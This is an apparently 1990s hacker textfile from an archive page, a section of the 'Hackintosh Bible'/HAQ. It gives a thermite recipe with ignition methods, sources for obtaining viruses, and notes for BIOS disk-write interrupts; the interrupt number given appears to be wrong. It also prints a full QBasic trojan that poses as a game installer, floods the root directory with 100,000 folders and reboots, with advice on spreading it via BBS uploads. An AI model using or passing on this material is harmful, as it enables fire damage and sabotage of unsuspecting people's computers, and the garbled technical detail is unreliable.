home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / HackintoshBiblev1.3.sit / Hackintosh Bible v1.3.rsrc / TEXT_164.txt < prev    next >
Text File  |  1996-11-10  |  3KB  |  90 lines

  1. approx. 2200 deg C)
  2. and can be used to burn through most anything.
  3.  
  4. Materials: powdered aluminum, powdered iron oxide
  5.  
  6. Procedure: mix the two powders together as evenly as possible
  7.  
  8. Ignition:  thermite is difficult to ignite but these work
  9.             a) mix a small amount of potassium chlorate into the
  10.                thermite mixture and ignite with a few drops of
  11.                sulfuric acid
  12.             b) magnesium strip or 'sparkler' stuck into the powder
  13.                which is then lit as a fuse
  14.  
  15. =====================================================================
  16. V. Infection
  17.      (Virii, Trojans, Worms and other creepy crawlies)
  18.  
  19. WHERE CAN I GET SOME VIRII?
  20. The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
  21. Problem:  They demand a virus they don't have in their archives to
  22. let you in.  Good luck finding one.  The best way is to write one,
  23. even if it's in BASIC. It'll probably get you in.  They have
  24. THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
  25. from what I know! For more info, gopher to wiretap.spies.com and dig
  26. around in their online library under technical info.
  27.  
  28. There are alot of places in the US to get virii too:
  29. The Hell Pit in Chicago has over 1500, and they don't accept the
  30. lame stuff like the ones written in basic, so they're all good ones.
  31.  
  32. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  33.  
  34. INTS USED:
  35. (from Belisarius)
  36. You want Int 18h, AH=03h,
  37. Al==Num sectors to write
  38. BX==offset of pointer to buffer
  39. CH=cylinder Number
  40. Cl=sector number
  41. DX=head number
  42. Dl=drive numbers
  43. ES=segment of pointer with buffer
  44.  
  45. for CH=it's the low 8 bits of 10 bit cylinder number,
  46. for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
  47.                                    0-5=sector number.
  48. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
  49. AH=status, AL=number of sectors written flags, carry set if an error.
  50.  
  51. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  52.  
  53. SAMPLE OF A TROJAN
  54. (from Spear)
  55.  
  56. This is a little trojan I wrote in Qbasic 4.5  It's a bitch!
  57.  
  58. REM bitch by Spear
  59. color 14,0
  60. print"installing datafiles...  Please wait..."
  61. print"This may take up to 20 minutes, depending on your computer..."
  62. shell "cd\"
  63. for a = 1 to 100000
  64. a$=str$(a)
  65. c$="md" + a$ + ".hee"
  66. shell c$
  67. next a
  68. cls
  69. print"Cybermattixx Version 1.0 is now installed on your system..."
  70. print"Have a shitty day!"
  71. print " ?AM?"
  72. print
  73. input "Hit ENTER To REBOOT your System now!";a$
  74. shell "boot.com"
  75.  
  76. How to use it?
  77. This can pose as the installation program for a game. This means that
  78. when you upload it to a BBS or something, and post that it is a
  79. kickass game, people will download it and try to install it on their
  80. computers!
  81.  
  82. What does it do?
  83. This program changes directory to the root and makes 100000 dirs in
  84. the root.  You cannot use deltree to wipe them out in one chunk and
  85. you CANNOT get rid of them without doing reverse engineering on the
  86. program, ie. rd instead of md.  To get rid of them any other way you
  87. would have to format c: or d:
  88.  
  89. -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=
  90.